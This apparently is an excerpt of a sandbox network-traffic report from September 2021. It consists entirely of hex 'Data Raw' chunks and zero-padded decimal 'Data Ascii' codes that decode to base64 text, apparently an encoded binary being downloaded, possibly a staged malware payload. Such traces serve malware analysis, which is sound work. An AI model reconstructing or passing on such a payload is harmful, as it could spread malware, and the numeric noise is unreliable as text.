                                                                                              Data Ascii: 0 65 0 65 0 68 0 65 0 99 0 77 0 122 0 119 0 77 0 77 0 122 0 121 0 87 0 97 0 74 0 83 0 66 0 104 0 109 0 105 0 89 0 103 0 89 0 65 0 103 0 65 0 65 0 90 0 111 0 109 0 73 0 71 0 65 0 81 0 65 0 65 0 71 0 97 0 74 0 105 0 66 0 103 0 71 0 65 0 65 0 66 0 109 0 105
                                                                                              2021-09-27 18:27:45 UTC2827INData Raw: 31 20 30 20 31 30 33 20 30 20 31 31 31 20 30 20 31 32 32 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 31 38 20 30 20 35 36 20 30 20 38 36 20 30 20 37 39 20 30 20 37 37 20 30 20 37 30 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 31 30 36 20 30 20 35 31 20 30 20 35 30 20 30 20 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 38 31 20 30 20 37 31 20 30 20 31 31 31 20 30 20 34 37 20 30 20 39 37 20 30 20 36 38 20 30 20 36 38 20 30 20 37 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 34 33 20 30 20 37 37 20 30 20 38 30 20 30 20 35 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 35 20 30 20 37 37 20 30 20 31 31 31 20 30 20 34 37 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 35 34 20 30 20 36 36 20 30 20 34
                                                                                              Data Ascii: 1 0 103 0 111 0 122 0 107 0 65 0 65 0 86 0 118 0 56 0 86 0 79 0 77 0 70 0 65 0 65 0 69 0 106 0 51 0 50 0 66 0 118 0 65 0 81 0 71 0 111 0 47 0 97 0 68 0 68 0 79 0 81 0 65 0 67 0 43 0 77 0 80 0 53 0 65 0 65 0 75 0 77 0 111 0 47 0 107 0 65 0 65 0 54 0 66 0 4
                                                                                              2021-09-27 18:27:45 UTC2843INData Raw: 20 35 36 20 30 20 39 39 20 30 20 38 34 20 30 20 34 37 20 30 20 34 37 20 30 20 35 32 20 30 20 38 30 20 30 20 36 39 20 30 20 36 38 20 30 20 37 33 20 30 20 31 30 38 20 30 20 37 30 20 30 20 34 33 20 30 20 37 33 20 30 20 37 38 20 30 20 35 37 20 30 20 34 33 20 30 20 36 35 20 30 20 36 36 20 30 20 34 38 20 30 20 36 38 20 30 20 31 30 32 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 39 20 30 20 31 30 34 20 30 20 37 34 20 30 20 34 33 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 34 38 20 30 20 34 38 20 30 20 37 33 20 30 20 31 30 35 20 30 20 38 31 20 30 20 37 31 20 30 20 37 36 20 30 20 38 32 20 30 20 31 30 32 20 30 20 31 30 34 20 30 20 31 30 31 20 30 20 31 32 31 20 30 20 39 39 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30
                                                                                              Data Ascii: 56 0 99 0 84 0 47 0 47 0 52 0 80 0 69 0 68 0 73 0 108 0 70 0 43 0 73 0 78 0 57 0 43 0 65 0 66 0 48 0 68 0 102 0 57 0 49 0 47 0 79 0 104 0 74 0 43 0 102 0 47 0 47 0 105 0 48 0 48 0 73 0 105 0 81 0 71 0 76 0 82 0 102 0 104 0 101 0 121 0 99 0 73 0 69 0 65 0
                                                                                              2021-09-27 18:27:45 UTC2859INData Raw: 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 39 30 20 30 20 31 30 33 20 30 20 31 30 35 20 30 20 35 36 20 30 20 39 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 37 34 20 30 20 31 30 32 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 38 20 30 20 39 39 20 30 20 35 35 20 30 20 31 30 32 20 30 20 31 30 35 20 30 20 31 32 30 20 30 20 35 36 20 30 20 31 31 32 20 30 20 31 30 38 20 30 20 31 31 36 20 30 20 31 31 31 20 30 20 35 35 20 30 20 37 37 20 30 20 38 32 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 36 37 20 30 20 37 33 20 30 20 31 31 38 20 30 20 37 31 20 30 20 35 34 20 30 20
                                                                                              Data Ascii: 19 0 65 0 65 0 103 0 56 0 81 0 81 0 47 0 51 0 90 0 103 0 105 0 56 0 98 0 47 0 100 0 81 0 106 0 111 0 74 0 102 0 51 0 47 0 47 0 48 0 99 0 55 0 102 0 105 0 120 0 56 0 112 0 108 0 116 0 111 0 55 0 77 0 82 0 65 0 65 0 80 0 57 0 49 0 67 0 73 0 118 0 71 0 54 0
                                                                                              2021-09-27 18:27:45 UTC2875INData Raw: 31 30 30 20 30 20 36 35 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 39 30 20 30 20 31 30 36 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 31 35 20 30 20 37 30 20 30 20 35 34 20 30 20 36 38 20 30 20 38 35 20 30 20 31 32 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 35 31 20 30 20 35 30 20 30 20 37 30 20 30 20 31 30 37 20 30 20 39 38 20 30 20 31 31 39 20 30 20 37 30 20 30 20 31 30 38 20 30 20 36 35 20 30 20 35 34 20 30 20 31 32 31 20 30 20 37 32 20 30 20 35 30 20 30 20 31 31 39 20 30 20 38 31 20 30 20 38 34 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 36 20 30 20 38 31 20 30 20 31 30 30 20 30 20 36 35 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 35 30 20 30 20 35 36 20 30 20 31 30 36 20 30 20 34 37 20
                                                                                              Data Ascii: 100 0 65 0 102 0 111 0 90 0 106 0 77 0 65 0 65 0 79 0 115 0 70 0 54 0 68 0 85 0 122 0 65 0 65 0 68 0 51 0 50 0 70 0 107 0 98 0 119 0 70 0 108 0 65 0 54 0 121 0 72 0 50 0 119 0 81 0 84 0 47 0 100 0 104 0 66 0 81 0 100 0 65 0 102 0 111 0 50 0 56 0 106 0 47
                                                                                              2021-09-27 18:27:45 UTC2891INData Raw: 30 20 37 32 20 30 20 38 32 20 30 20 36 36 20 30 20 31 30 36 20 30 20 38 38 20 30 20 31 30 33 20 30 20 38 31 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 31 20 30 20 31 30 37 20 30 20 31 31 39 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 37 20 30 20 37 34 20 30 20 31 31 30 20 30 20 36 37 20 30 20 38 34 20 30 20 38 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 39 30 20 30 20 31 31 39 20 30 20 31 30 37 20 30 20 34 38 20 30 20 36 36 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 30 39 20 30 20 39 39 20 30 20 37 34 20 30 20 37 37 20 30 20 38 31 20 30 20 39 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 34 20 30 20 31 31 30 20 30 20 36
                                                                                              Data Ascii: 0 72 0 82 0 66 0 106 0 88 0 103 0 81 0 106 0 89 0 81 0 107 0 119 0 66 0 81 0 65 0 65 0 70 0 67 0 74 0 110 0 67 0 84 0 85 0 72 0 65 0 65 0 65 0 105 0 90 0 119 0 107 0 48 0 66 0 119 0 65 0 65 0 73 0 109 0 99 0 74 0 77 0 81 0 99 0 65 0 65 0 67 0 74 0 110 0 6
                                                                                              2021-09-27 18:27:45 UTC2907INData Raw: 35 32 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 35 37 20 30 20 39 30 20 30 20 31 30 30 20 30 20 37 32 20 30 20 31 30 30 20 30 20 38 37 20 30 20 31 30 35 20 30 20 31 32 32 20 30 20 38 38 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 36 38 20 30 20 31 30 36 20 30 20 39 30 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 34 37 20 30 20 35 37 20 30 20 39 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 35 20 30 20 37 38 20 30 20 37 33 20 30 20 34 33 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 39 20 30 20 35 33 20 30 20 31 31 31 20 30 20 38 34 20 30 20 37 38 20 30 20 31 30 38 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 32 20 30 20 34 37
                                                                                              Data Ascii: 52 0 104 0 102 0 57 0 90 0 100 0 72 0 100 0 87 0 105 0 122 0 88 0 85 0 119 0 69 0 65 0 65 0 97 0 68 0 106 0 90 0 81 0 65 0 66 0 88 0 47 0 57 0 97 0 70 0 119 0 75 0 78 0 73 0 43 0 69 0 65 0 65 0 100 0 69 0 53 0 111 0 84 0 78 0 108 0 65 0 65 0 70 0 102 0 47
                                                                                              2021-09-27 18:27:45 UTC2923INData Raw: 36 20 30 20 31 31 31 20 30 20 35 30 20 30 20 37 30 20 30 20 31 32 31 20 30 20 31 31 38 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 37 38 20 30 20 38 31 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 38 30 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 35 36 20 30 20 37 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 37 37 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 38 35 20 30 20 35 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 37 20 30 20 31 31 39 20 30 20 31
                                                                                              Data Ascii: 6 0 111 0 50 0 70 0 121 0 118 0 114 0 47 0 47 0 49 0 78 0 81 0 90 0 111 0 109 0 100 0 121 0 80 0 114 0 47 0 47 0 43 0 103 0 56 0 70 0 119 0 65 0 65 0 103 0 56 0 81 0 77 0 47 0 51 0 85 0 73 0 85 0 50 0 103 0 65 0 66 0 65 0 65 0 65 0 47 0 120 0 87 0 119 0 1
                                                                                              2021-09-27 18:27:45 UTC2939INData Raw: 35 20 30 20 37 39 20 30 20 31 31 35 20 30 20 37 31 20 30 20 31 30 35 20 30 20 38 39 20 30 20 39 30 20 30 20 35 32 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 39 30 20 30 20 31 30 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 31 20 30 20 37 37 20 30 20 35 32 20 30 20 36 35 20 30 20 38 38 20 30 20 38 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 39 38 20 30 20 35 33 20 30 20 34 38 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 35 34 20 30 20 31 31 39 20 30 20 39 37 20 30 20 37 34 20 30 20 31 30 34 20 30 20 31 31 30 20 30 20 38 33 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34
                                                                                              Data Ascii: 5 0 79 0 115 0 71 0 105 0 89 0 90 0 52 0 103 0 103 0 65 0 65 0 106 0 89 0 90 0 109 0 81 0 65 0 65 0 65 0 90 0 111 0 77 0 52 0 65 0 88 0 85 0 73 0 105 0 98 0 53 0 48 0 103 0 103 0 65 0 65 0 54 0 119 0 97 0 74 0 104 0 110 0 83 0 67 0 65 0 65 0 67 0 78 0 104
                                                                                              2021-09-27 18:27:45 UTC2955INData Raw: 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 31 31 31 20 30 20 38 36 20 30 20 35 32 20 30 20 34 39 20 30 20 37 30 20 30 20 35 31 20 30 20 37 30 20 30 20 36 37 20 30 20 37 34 20 30 20 38 38 20 30 20 31 30 31 20 30 20 36 37 20 30 20 37 34 20 30 20 38 38 20 30 20 31 30 31 20 30 20 38 34 20 30 20 37 32 20 30 20 38 32 20 30 20 31 30 31 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 32 30 20 30 20 34 38 20 30 20 38 38 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 39 37 20 30 20 31 32 30 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 30 38 20 30 20 34 39 20 30 20 35 37 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 38 38 20 30 20 37 37 20 30 20 37 30 20 30 20 36 35 20 30 20 36
                                                                                              Data Ascii: 0 105 0 85 0 88 0 111 0 86 0 52 0 49 0 70 0 51 0 70 0 67 0 74 0 88 0 101 0 67 0 74 0 88 0 101 0 84 0 72 0 82 0 101 0 119 0 69 0 65 0 65 0 65 0 65 0 120 0 48 0 88 0 119 0 103 0 97 0 120 0 65 0 65 0 73 0 108 0 49 0 57 0 80 0 56 0 86 0 88 0 77 0 70 0 65 0 6
                                                                                              2021-09-27 18:27:45 UTC2961INData Raw: 30 20 37 36 20 30 20 35 30 20 30 20 37 30 20 30 20 38 30 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 32 20 30 20 31 32 30 20 30 20 38 37 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 35 34 20 30 20 37 34 20 30 20 39 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 32 20 30 20 31 32 30 20 30 20 38 31 20 30 20 31 30 36 20 30 20 38 35 20 30 20 38 38 20 30 20 35 32 20 30 20 38 35 20 30 20 37 31 20 30 20 31 30 33 20 30 20 31 31 35 20 30 20 31 32 32 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 34 33 20 30 20 31 30 35 20 30 20 37 35 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 34 20 30 20 39 39 20 30 20 36 36 20 30 20 34 38
                                                                                              Data Ascii: 0 76 0 50 0 70 0 80 0 47 0 100 0 102 0 120 0 87 0 47 0 51 0 85 0 73 0 54 0 74 0 99 0 69 0 65 0 65 0 67 0 78 0 82 0 102 0 120 0 81 0 106 0 85 0 88 0 52 0 85 0 71 0 103 0 115 0 122 0 85 0 65 0 65 0 85 0 43 0 105 0 75 0 66 0 65 0 65 0 65 0 104 0 99 0 66 0 48
                                                                                              2021-09-27 18:27:45 UTC2977INData Raw: 37 20 30 20 38 34 20 30 20 31 31 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 38 35 20 30 20 35 34 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 35 34 20 30 20 31 31 37 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 39 38 20 30 20 31 31 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 35 34 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 37 39 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 35 35 20 30 20 31 31 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 35 34 20 30 20 35 34 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 38 32 20 30 20 31 31 37 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20
                                                                                              Data Ascii: 7 0 84 0 113 0 65 0 65 0 68 0 85 0 54 0 103 0 65 0 65 0 54 0 117 0 111 0 65 0 65 0 80 0 98 0 113 0 65 0 65 0 65 0 79 0 54 0 119 0 65 0 65 0 73 0 79 0 115 0 65 0 65 0 67 0 55 0 114 0 65 0 65 0 65 0 54 0 54 0 119 0 65 0 65 0 82 0 117 0 115 0 65 0 65 0 70 0
                                                                                              2021-09-27 18:27:45 UTC2993INData Raw: 20 31 31 32 20 30 20 35 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 37 35 20 30 20 31 30 32 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 31 31 36 20 30 20 37 37 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 35 30 20 30 20 31 30 36 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 36 35 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 37 37 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 39 30 20 30 20 35 33 20 30 20 35 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 38 20 30 20 35 33 20 30 20 34 33 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 39 39 20 30 20 31 31 30 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 38 39 20 30 20 31 31 39 20 30 20 36 36
                                                                                              Data Ascii: 112 0 57 0 65 0 65 0 71 0 75 0 102 0 81 0 65 0 67 0 116 0 77 0 69 0 65 0 65 0 50 0 106 0 66 0 65 0 65 0 79 0 65 0 119 0 81 0 65 0 65 0 80 0 77 0 85 0 65 0 65 0 90 0 53 0 57 0 65 0 65 0 78 0 53 0 43 0 81 0 65 0 67 0 99 0 110 0 48 0 65 0 65 0 89 0 119 0 66
                                                                                              2021-09-27 18:27:45 UTC3009INData Raw: 39 20 30 20 36 35 20 30 20 39 37 20 30 20 36 35 20 30 20 36 35 20 30 20 34 38 20 30 20 36 35 20 30 20 36 38 20 30 20 35 32 20 30 20 36 35 20 30 20 37 34 20 30 20 38 31 20 30 20 36 36 20 30 20 31 32 32 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 34 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 36 35 20 30 20 36 36 20 30 20 31 32 31 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 35 37 20 30 20 36 35 20 30 20 36 37 20 30 20 37 33 20 30 20 36 35 20 30 20 39 37 20 30 20 36 35 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 39 39
                                                                                              Data Ascii: 9 0 65 0 97 0 65 0 65 0 48 0 65 0 68 0 52 0 65 0 74 0 81 0 66 0 122 0 65 0 67 0 65 0 65 0 80 0 65 0 66 0 104 0 65 0 67 0 65 0 65 0 97 0 65 0 66 0 121 0 65 0 71 0 85 0 65 0 90 0 103 0 65 0 57 0 65 0 67 0 73 0 65 0 97 0 65 0 66 0 48 0 65 0 72 0 81 0 65 0 99
                                                                                              2021-09-27 18:27:45 UTC3025INData Raw: 30 20 31 30 34 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 39 20 30 20 36 35 20 30 20 38 34 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 30 34 20 30 20 36 35 20 30 20 37 31 20 30 20 34 38 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 34 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 31 20 30 20 39 39 20 30 20 36 35 20 30 20 38 39 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 39 20 30 20 37 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 31 39 20 30 20 36 35 20 30 20 37 32 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 32
                                                                                              Data Ascii: 0 104 0 65 0 71 0 119 0 65 0 84 0 103 0 66 0 104 0 65 0 71 0 48 0 65 0 90 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 84 0 65 0 66 0 108 0 65 0 71 0 99 0 65 0 89 0 81 0 66 0 115 0 65 0 69 0 77 0 65 0 98 0 119 0 66 0 119 0 65 0 72 0 107 0 65 0 99 0 103 0 66 0 112
                                                                                              2021-09-27 18:27:45 UTC3041INData Raw: 30 20 30 20 38 35 20 30 20 36 38 20 30 20 38 35 20 30 20 35 30 20 30 20 31 30 38 20 30 20 35 34 20 30 20 39 30 20 30 20 38 37 20 30 20 35 37 20 30 20 31 30 39 20 30 20 38 35 20 30 20 31 30 39 20 30 20 38 36 20 30 20 31 32 32 20 30 20 39 38 20 30 20 35 31 20 30 20 38 36 20 30 20 31 32 31 20 30 20 38 39 20 30 20 35 30 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 38 32 20 30 20 35 30 20 30 20 38 36 20 30 20 34 38 20 30 20 38 32 20 30 20 37 31 20 30 20 37 30 20 30 20 34 38 20 30 20 39 30 20 30 20 38 35 20 30 20 39 30 20 30 20 31 31 38 20 30 20 39 39 20 30 20 31 30 39 20 30 20 34 39 20 30 20 31 30 34 20 30 20 31 30 30 20 30 20 37 30 20 30 20 39 39 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 38
                                                                                              Data Ascii: 0 0 85 0 68 0 85 0 50 0 108 0 54 0 90 0 87 0 57 0 109 0 85 0 109 0 86 0 122 0 98 0 51 0 86 0 121 0 89 0 50 0 85 0 65 0 65 0 69 0 103 0 66 0 82 0 50 0 86 0 48 0 82 0 71 0 70 0 48 0 90 0 85 0 90 0 118 0 99 0 109 0 49 0 104 0 100 0 70 0 99 0 65 0 65 0 80 0 8
                                                                                              2021-09-27 18:27:45 UTC3057INData Raw: 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35
                                                                                              Data Ascii: 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 69 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 89 0 65 0 65 0 65 0 65 0 65 0 65
                                                                                              2021-09-27 18:27:45 UTC3073INData Raw: 20 36 35 20 30 20 36 36 20 30 20 35 32 20 30 20 34 39 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 37 38 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 38 31 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 34 20 30 20 37 38 20 30 20 31 30 33 20 30 20 36 36 20 30 20 36 35 20 30 20 36 37 20 30 20 31 30 33 20 30 20 38 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 38 20 30 20 38 34 20 30 20 31 31 36 20 30 20 36 35 20 30 20 38 31 20 30 20 36 38 20
                                                                                              Data Ascii: 65 0 66 0 52 0 49 0 119 0 69 0 65 0 78 0 65 0 69 0 65 0 65 0 79 0 81 0 69 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 114 0 78 0 103 0 66 0 65 0 67 0 103 0 86 0 65 0 65 0 68 0 107 0 66 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 78 0 84 0 116 0 65 0 81 0 68
                                                                                              2021-09-27 18:27:45 UTC3089INData Raw: 20 30 20 31 31 39 20 30 20 34 37 20 30 20 31 31 38 20 30 20 31 30 36 20 30 20 31 31 39 20 30 20 34 37 20 30 20 31 31 38 20 30 20 36 38 20 30 20 31 30 33 20 30 20 35 36 20 30 20 37 39 20 30 20 31 30 36 20 30 20 31 30 33 20 30 20 35 36 20 30 20 37 39 20 30 20 36 38 20 30 20 38 31 20 30 20 35 36 20 30 20 37 38 20 30 20 36 38 20 30 20 36 35 20 30 20 35 36 20 30 20 37 37 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 35 32 20 30 20 37 37 20 30 20 36 37 20 30 20 31 30 33 20 30 20 35 32 20 30 20 37 36 20 30 20 31 30 35 20 30 20 31 30 33 20 30 20 38 39 20 30 20 36 39 20 30 20 31 30 33 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35
                                                                                              Data Ascii: 0 119 0 47 0 118 0 106 0 119 0 47 0 118 0 68 0 103 0 56 0 79 0 106 0 103 0 56 0 79 0 68 0 81 0 56 0 78 0 68 0 65 0 56 0 77 0 105 0 119 0 52 0 77 0 67 0 103 0 52 0 76 0 105 0 103 0 89 0 69 0 103 0 119 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65
                                                                                              2021-09-27 18:27:45 UTC3105INData Raw: 31 30 33 20 30 20 31 30 37 20 30 20 37 35 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 37 39 20 30 20 36 38 20 30 20 31 31 39 20 30 20 38 35 20 30 20 37 31 20 30 20 36 36 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 37 39 20 30 20 36 38 20 30 20 31 31 39 20 30 20 38 31 20 30 20 37 30 20 30 20 31 30 34 20 30 20 31 31 39 20 30 20 38 39 20 30 20 37 38 20 30 20 36 38 20 30 20 31 31 39 20 30 20 38 35 20 30 20 37 37 20 30 20 31 30 36 20 30 20 31 31 39 20 30 20 38 31 20 30 20 37 37 20 30 20 36 38 20 30 20 31 31 39 20 30 20 37 33 20 30 20 37 36 20 30 20 36 38 20 30 20 31 30 33 20 30 20 37 33 20 30 20 37 35 20 30 20 36 38 20 30 20 38 31 20 30 20 38 39 20 30 20 37 34 20 30 20 31 30 34 20 30 20 31 31 39 20 30 20 38 35 20 30 20 37 36 20 30 20 31 30
                                                                                              Data Ascii: 103 0 107 0 75 0 105 0 119 0 103 0 79 0 68 0 119 0 85 0 71 0 66 0 119 0 103 0 79 0 68 0 119 0 81 0 70 0 104 0 119 0 89 0 78 0 68 0 119 0 85 0 77 0 106 0 119 0 81 0 77 0 68 0 119 0 73 0 76 0 68 0 103 0 73 0 75 0 68 0 81 0 89 0 74 0 104 0 119 0 85 0 76 0 10
                                                                                              2021-09-27 18:27:45 UTC3121INData Raw: 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 38 32 20 30 20 31 30 30 20 30 20 36 35 20 30 20 36 38 20 30 20 36 39 20 30 20 31 30 36 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 35 33 20 30 20 38 39 20 30 20 31 30 30 20 30 20 31 31 35 20 30 20 36 35 20 30 20 38 30 20 30 20 